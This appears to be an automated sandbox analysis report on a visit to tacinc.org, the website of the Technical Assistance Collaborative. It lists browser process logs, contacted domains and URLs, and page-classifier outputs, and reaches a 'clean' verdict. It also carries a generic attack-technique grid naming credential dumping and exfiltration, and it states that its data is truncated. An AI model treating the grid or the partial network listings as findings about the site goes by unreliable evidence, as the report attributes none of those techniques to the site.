Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2296,i,3073160073782762063,5984773800657840567,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.tacinc.org"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2296,i,3073160073782762063,5984773800657840567,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://ampcid.google.com/v1/publisher:getClientId0%URL Reputationsafe
https://swiperjs.com0%URL Reputationsafe
https://jqueryui.com0%URL Reputationsafe
https://fontawesome.com/license/free0%URL Reputationsafe
http://daneden.me/animate0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
stats.wp.com
192.0.76.3
truefalse
    unknown
    bg.microsoft.map.fastly.net
    199.232.210.172
    truefalse
      unknown
      wpmu-stats.b-cdn.net
      169.150.247.38
      truefalse
        unknown
        pixel.wp.com
        192.0.76.3
        truefalse
          unknown
          www.tacinc.org
          141.193.213.11
          truefalse
            unknown
            matomo-wpmudev-1288779782.us-east-2.elb.amazonaws.com
            18.191.25.33
            truefalse
              unknown
              www.google.com
              142.250.186.68
              truefalse
                unknown
                pluralism.themancav.com
                207.148.0.16
                truefalse
                  unknown
                  default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                  217.20.57.18
                  truefalse
                    unknown
                    cdngetmyname.biz
                    91.212.166.21
                    truefalse
                      unknown
                      fp2e7a.wpc.phicdn.net
                      192.229.221.95
                      truefalse
                        unknown
                        stats.wpmucdn.com
                        unknown
                        unknownfalse
                          unknown
                          use.typekit.net
                          unknown
                          unknownfalse
                            unknown
                            p.typekit.net
                            unknown
                            unknownfalse
                              unknown
                              stats1.wpmudev.com
                              unknown
                              unknownfalse
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                http://www.tacinc.org/false
                                  unknown
                                  https://www.tacinc.org/wp-content/plugins/elementor/assets/js/frontend.min.jsfalse
                                    unknown
                                    https://www.tacinc.org/wp-content/uploads/hummingbird-assets/3f86132df1672ee9bc320961d8b32c63.jsfalse
                                      unknown
                                      https://pluralism.themancav.com/0M/mravthcS07dyf5vvKj6Lt3I+9upDGv7qSz7mqide/oZ+PrQ==false
                                        unknown
                                        https://www.tacinc.org/wp-content/plugins/tac-tablepress-datatables-column-filter-widgets/css/ColumnFilterWidgets.min.cssfalse
                                          unknown
                                          https://stats1.wpmudev.com/track/?action_name=The%20Technical%20Assistance%20Collaborative%20-%20TAC&idsite=42744&rec=1&r=954907&h=14&m=4&s=7&url=https%3A%2F%2Fwww.tacinc.org%2F&_id=9e2e685fff1c48d6&_idts=1729706647&_idvc=1&_idn=1&_refts=0&_viewts=1729706647&send_image=0&pdf=1&qt=0&realp=0&wma=0&dir=0&fla=0&java=0&gears=0&ag=0&cookie=1&res=1280x1024&gt_ms=1242&pv_id=uRcmW0false
                                            unknown
                                            https://www.tacinc.org/wp-content/uploads/hummingbird-assets/2041663b2e746e59e63362466c21f79b.jsfalse
                                              unknown
                                              https://www.tacinc.org/wp-content/uploads/elementor/css/post-2444.cssfalse
                                                unknown
                                                https://www.tacinc.org/wp-content/uploads/2020/11/favicon32.pngfalse
                                                  unknown
                                                  https://www.tacinc.org/wp-content/themes/tac-child/images/icon-close.svgfalse
                                                    unknown
                                                    https://www.tacinc.org/wp-content/uploads/2020/11/logo.pngfalse
                                                      unknown
                                                      https://www.tacinc.org/wp-content/themes/socialdriver/css/fontawesome/webfonts/fa-solid-900.woff2false
                                                        unknown
                                                        https://www.tacinc.org/wp-content/plugins/elementor/assets/js/text-editor.2c35aafbe5bf0e127950.bundle.min.jsfalse
                                                          unknown
                                                          https://www.tacinc.org/wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.cssfalse
                                                            unknown
                                                            https://www.tacinc.org/false
                                                              unknown
                                                              https://www.tacinc.org/wp-content/uploads/2020/11/footer-tall.jpgfalse
                                                                unknown
                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://use.typekit.net/af/6e816b/00000000000000003b9b3064/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                  unknown
                                                                  https://use.typekit.net/af/705e94/00000000000000003b9b3062/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                    unknown
                                                                    https://use.typekit.net/af/0b59d6/00000000000000003b9b13b0/27/l?primer=f592e0a4b9356877842506ce34430chromecache_160.2.drfalse
                                                                      unknown
                                                                      https://use.typekit.net/af/1c187b/00000000000000003b9b3084/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                        unknown
                                                                        https://use.typekit.net/af/74d1b5/00000000000000003b9b13b1/27/a?primer=f592e0a4b9356877842506ce34430chromecache_160.2.drfalse
                                                                          unknown
                                                                          https://use.typekit.net/af/f99f28/00000000000000003b9b13b2/27/d?primer=f592e0a4b9356877842506ce34430chromecache_160.2.drfalse
                                                                            unknown
                                                                            https://use.typekit.net/af/0ff5e1/00000000000000003b9b3078/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                              unknown
                                                                              https://ampcid.google.com/v1/publisher:getClientIdchromecache_144.2.dr, chromecache_143.2.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://use.typekit.net/af/4c1f88/00000000000000003b9b308a/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                unknown
                                                                                https://swiperjs.comchromecache_117.2.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://use.typekit.net/af/804528/00000000000000003b9b13b8/27/d?primer=f592e0a4b9356877842506ce34430chromecache_160.2.drfalse
                                                                                  unknown
                                                                                  https://use.typekit.net/af/b0477e/00000000000000003b9b13b4/27/d?primer=f592e0a4b9356877842506ce34430chromecache_160.2.drfalse
                                                                                    unknown
                                                                                    https://www.tacinc.org/what-we-do/financing-reimbursement-strategies/chromecache_126.2.drfalse
                                                                                      unknown
                                                                                      https://use.typekit.net/af/2132f7/00000000000000003b9b308c/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                        unknown
                                                                                        https://use.typekit.net/af/5b5251/00000000000000003b9b3065/27/d?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                          unknown
                                                                                          https://use.typekit.net/af/c31dbb/00000000000000003b9b305f/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                            unknown
                                                                                            https://use.typekit.net/af/2c5b68/00000000000000003b9b3080/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                              unknown
                                                                                              https://use.typekit.net/af/4a329e/00000000000000003b9b3089/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                unknown
                                                                                                http://www.twitter.com/TACIncBostonchromecache_126.2.drfalse
                                                                                                  unknown
                                                                                                  http://getbootstrap.com)chromecache_157.2.drfalse
                                                                                                    unknown
                                                                                                    https://www.tacinc.org/focus-areas/homelessness/youth-homelessness/chromecache_126.2.drfalse
                                                                                                      unknown
                                                                                                      https://use.typekit.net/af/576d53/00000000000000003b9b3066/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                        unknown
                                                                                                        https://www.tacinc.org/resources/saih/chromecache_126.2.drfalse
                                                                                                          unknown
                                                                                                          https://www.tacinc.org/what-we-do/policy-leadership/national-policy-advocacy/chromecache_126.2.drfalse
                                                                                                            unknown
                                                                                                            https://use.typekit.net/af/0b59d6/00000000000000003b9b13b0/27/a?primer=f592e0a4b9356877842506ce34430chromecache_160.2.drfalse
                                                                                                              unknown
                                                                                                              https://use.typekit.net/af/8e2bbd/00000000000000003b9b3072/27/d?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                unknown
                                                                                                                https://www.tacinc.org/resources/covid-19-resources/chromecache_126.2.drfalse
                                                                                                                  unknown
                                                                                                                  https://use.typekit.net/af/74d1b5/00000000000000003b9b13b1/27/l?primer=f592e0a4b9356877842506ce34430chromecache_160.2.drfalse
                                                                                                                    unknown
                                                                                                                    https://use.typekit.net/af/c57249/00000000000000003b9b307e/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                      unknown
                                                                                                                      https://use.typekit.net/af/2b5aa0/00000000000000003b9b13ae/27/a?primer=f592e0a4b9356877842506ce34430chromecache_160.2.drfalse
                                                                                                                        unknown
                                                                                                                        https://use.typekit.net/af/f7d492/00000000000000003b9b3067/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                          unknown
                                                                                                                          https://www.tacinc.org/wp-content/uploads/2020/11/logo-white-horizontal-740x196.pngchromecache_126.2.drfalse
                                                                                                                            unknown
                                                                                                                            https://www.tacinc.org/wp-content/uploads/2020/11/favicon144.pngchromecache_126.2.drfalse
                                                                                                                              unknown
                                                                                                                              https://use.typekit.net/af/576d53/00000000000000003b9b3066/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                unknown
                                                                                                                                https://use.typekit.net/af/bcf2f4/00000000000000003b9b3083/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                  unknown
                                                                                                                                  https://www.tacinc.org/focus-areas/homelessness/disaster-preparedness-recovery/chromecache_126.2.drfalse
                                                                                                                                    unknown
                                                                                                                                    https://use.typekit.net/af/32b365/00000000000000003b9b3071/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                      unknown
                                                                                                                                      https://use.typekit.net/af/c47696/00000000000000003b9b305e/27/d?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                        unknown
                                                                                                                                        https://use.typekit.net/af/8f262f/00000000000000003b9b13ac/27/a?primer=f592e0a4b9356877842506ce34430chromecache_160.2.drfalse
                                                                                                                                          unknown
                                                                                                                                          https://use.typekit.net/af/7e7028/00000000000000003b9b308b/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                            unknown
                                                                                                                                            https://www.tacinc.org/focus-areas/homelessness/continuums-of-care-system-planning/chromecache_126.2.drfalse
                                                                                                                                              unknown
                                                                                                                                              https://www.tacinc.org/focus-areas/racial-equity-action-lab/equity-focused-systems-redesign/chromecache_126.2.drfalse
                                                                                                                                                unknown
                                                                                                                                                https://use.typekit.net/af/59d17d/00000000000000003b9b13ba/27/a?primer=f592e0a4b9356877842506ce34430chromecache_160.2.drfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://use.typekit.net/af/2b5aa0/00000000000000003b9b13ae/27/l?primer=f592e0a4b9356877842506ce34430chromecache_160.2.drfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://flickity.metafizzy.cochromecache_192.2.drfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://use.typekit.net/af/3e6df8/00000000000000003b9b306b/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://www.tacinc.org/resources/saih/research-and-activities/chromecache_126.2.drfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://jqueryui.comchromecache_119.2.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.tacinc.org/focus-areas/medicaid/long-term-services-supports/chromecache_126.2.drfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://use.typekit.net/af/8023ab/00000000000000003b9b3085/27/d?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://use.typekit.net/af/32b365/00000000000000003b9b3071/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://www.tacinc.org/projects-initiatives/clients-partners-funders/chromecache_126.2.drfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://use.typekit.net/af/8f262f/00000000000000003b9b13ac/27/l?primer=f592e0a4b9356877842506ce34430chromecache_160.2.drfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://use.typekit.net/af/59d17d/00000000000000003b9b13ba/27/l?primer=f592e0a4b9356877842506ce34430chromecache_160.2.drfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://fontawesome.com/license/freechromecache_156.2.drfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://use.typekit.net/af/c31dbb/00000000000000003b9b305f/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://use.typekit.net/af/30f4b6/00000000000000003b9b3070/27/d?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://www.tacinc.org/focus-areas/chromecache_126.2.drfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://use.typekit.net/af/73e1a8/00000000000000003b9b13b9/27/l?primer=f592e0a4b9356877842506ce34430chromecache_160.2.drfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://daneden.me/animatechromecache_157.2.drfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://use.typekit.net/af/519896/00000000000000003b9b3079/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://www.tacinc.org/focus-areas/mental-health-substance-use/chromecache_126.2.drfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://www.tacinc.org/what-we-do/evaluation-quality-improvement/chromecache_126.2.drfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://use.typekit.net/af/3a4ba8/00000000000000003b9b3077/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://use.typekit.net/af/6e816b/00000000000000003b9b3064/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://www.tacinc.org/about/racial-equity-statement/chromecache_126.2.drfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://use.typekit.net/af/d82519/00000000000000003b9b306a/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://www.tacinc.org/about/careers/chromecache_126.2.drfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://www.tacinc.org/resources/saih/community-power-network/chromecache_126.2.drfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://www.tacinc.org/wp-content/themes/socialdriver/js/respond.jschromecache_126.2.drfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://use.typekit.net/af/b683e3/00000000000000003b9b306c/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://use.typekit.net/af/d32834/00000000000000003b9b306d/27/d?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://use.typekit.net/af/65314b/00000000000000003b9b3086/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://www.tacinc.org/focus-areas/olmstead-community-integration/olmstead-compliance/chromecache_126.2.drfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://www.tacinc.org/what-we-do/customized-ta-training/chromecache_126.2.drfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://use.typekit.net/af/bc1760/00000000000000003b9b13b7/27/d?primer=f592e0a4b9356877842506ce34430chromecache_160.2.drfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://use.typekit.net/af/c57249/00000000000000003b9b307e/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://use.typekit.net/af/0dfb3d/00000000000000003b9b3082/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://use.typekit.net/af/3f8fac/00000000000000003b9b3087/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://use.typekit.net/af/949eb9/00000000000000003b9b3076/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://adservice.google.com/pagead/regclk?chromecache_169.2.drfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://use.typekit.net/af/40ff7f/00000000000000003b9b3061/27/a?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_160.2.drfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://www.tacinc.orgchromecache_126.2.drfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://www.tacinc.org/#websitechromecache_126.2.drfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                              142.250.186.68
                                                                                                                                                                                                                              www.google.comUnited States
                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                              169.150.247.38
                                                                                                                                                                                                                              wpmu-stats.b-cdn.netUnited States
                                                                                                                                                                                                                              2711SPIRITTEL-ASUSfalse
                                                                                                                                                                                                                              169.150.247.37
                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                              2711SPIRITTEL-ASUSfalse
                                                                                                                                                                                                                              91.212.166.21
                                                                                                                                                                                                                              cdngetmyname.bizUnited Kingdom
                                                                                                                                                                                                                              35819MOBILY-ASEtihadEtisalatCompanyMobilySAfalse
                                                                                                                                                                                                                              18.191.25.33
                                                                                                                                                                                                                              matomo-wpmudev-1288779782.us-east-2.elb.amazonaws.comUnited States
                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                              207.148.0.16
                                                                                                                                                                                                                              pluralism.themancav.comUnited States
                                                                                                                                                                                                                              20473AS-CHOOPAUSfalse
                                                                                                                                                                                                                              192.0.76.3
                                                                                                                                                                                                                              stats.wp.comUnited States
                                                                                                                                                                                                                              2635AUTOMATTICUSfalse
                                                                                                                                                                                                                              141.193.213.10
                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                              396845DV-PRIMARY-ASN1USfalse
                                                                                                                                                                                                                              141.193.213.11
                                                                                                                                                                                                                              www.tacinc.orgUnited States
                                                                                                                                                                                                                              396845DV-PRIMARY-ASN1USfalse
                                                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                                                              unknownReserved
                                                                                                                                                                                                                              unknownunknownfalse
                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                              192.168.2.6
                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                              Analysis ID:1540472
                                                                                                                                                                                                                              Start date and time:2024-10-23 20:02:59 +02:00
                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                              Overall analysis duration:0h 3m 23s
                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                              Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                              Sample URL:http://www.tacinc.org
                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                              Number of analysed new started processes analysed:6
                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                              Detection:CLEAN
                                                                                                                                                                                                                              Classification:clean0.win@17/163@30/11
                                                                                                                                                                                                                              EGA Information:Failed
                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.185.110, 74.125.71.84, 216.58.206.67, 34.104.35.123, 142.250.185.170, 2.16.164.82, 2.16.164.91, 142.250.185.99, 142.250.186.42, 2.19.126.219, 2.19.126.211, 172.217.18.8, 216.58.212.174, 142.250.186.136, 142.250.184.206, 4.245.163.56, 192.229.221.95, 13.95.31.18, 172.217.16.202, 142.250.186.74, 142.250.186.138, 142.250.185.106, 172.217.18.10, 142.250.181.234, 142.250.184.202, 142.250.186.106, 216.58.206.42, 142.250.74.202, 172.217.18.106, 142.250.186.170, 216.58.206.74, 216.58.212.138, 199.232.210.172, 40.69.42.241, 93.184.221.240, 142.250.184.195
                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, a1874.dscg1.akamai.net, clients2.google.com, use-stls.adobe.com.edgesuite.net, ocsp.digicert.com, www.googletagmanager.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, wu-b-net.trafficmanager.net, www.google-analytics.com, glb.sls.prod.dcat.dsp.trafficmanager.net, client.wns.windows.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, fonts.gstatic.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, p.typekit.net-stls-v3.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com, a1988.dscg1.akamai.net
                                                                                                                                                                                                                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                              • VT rate limit hit for: http://www.tacinc.org
                                                                                                                                                                                                                              No simulations
                                                                                                                                                                                                                              InputOutput
                                                                                                                                                                                                                              URL: https://www.tacinc.org/ Model: claude-3-haiku-20240307
                                                                                                                                                                                                                              ```json
                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                "contains_trigger_text": false,
                                                                                                                                                                                                                                "trigger_text": "unknown",
                                                                                                                                                                                                                                "prominent_button_name": "unknown",
                                                                                                                                                                                                                                "text_input_field_labels": "unknown",
                                                                                                                                                                                                                                "pdf_icon_visible": false,
                                                                                                                                                                                                                                "has_visible_captcha": false,
                                                                                                                                                                                                                                "has_urgent_text": false,
                                                                                                                                                                                                                                "has_visible_qrcode": false
                                                                                                                                                                                                                              }
                                                                                                                                                                                                                              URL: https://www.tacinc.org/ Model: claude-3-haiku-20240307
                                                                                                                                                                                                                              ```json
                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                "brands": [
                                                                                                                                                                                                                                  "TAC",
                                                                                                                                                                                                                                  "Technical Assistance Collaborative"
                                                                                                                                                                                                                                ]
                                                                                                                                                                                                                              }
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 156496, version 773.768
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):156496
                                                                                                                                                                                                                              Entropy (8bit):7.996570522285877
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:3072:OvM6gZMLmY8uGpjVnlooQ+GQs8jic0f/KkMdE:OU65LoP5QSsuic0f/cdE
                                                                                                                                                                                                                              MD5:6C4EEE562650E53CEE32496BDFBE534B
                                                                                                                                                                                                                              SHA1:1AAE708E3B94EE981B452A918D28ED037FBB5E18
                                                                                                                                                                                                                              SHA-256:9FC85F3A4544AB0D570C7F8F9BBB88DB8D92C359B2707580EA8B07C75673EAE2
                                                                                                                                                                                                                              SHA-512:EBCB5A2E2A908228F77ECD03B45491778CAD73DDC39FA3A6334B129AAF9FA36C16C0307AEAAD74D77F616B5B34AAC52D91E9F4816945253DC9A826DDD71F4D12
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
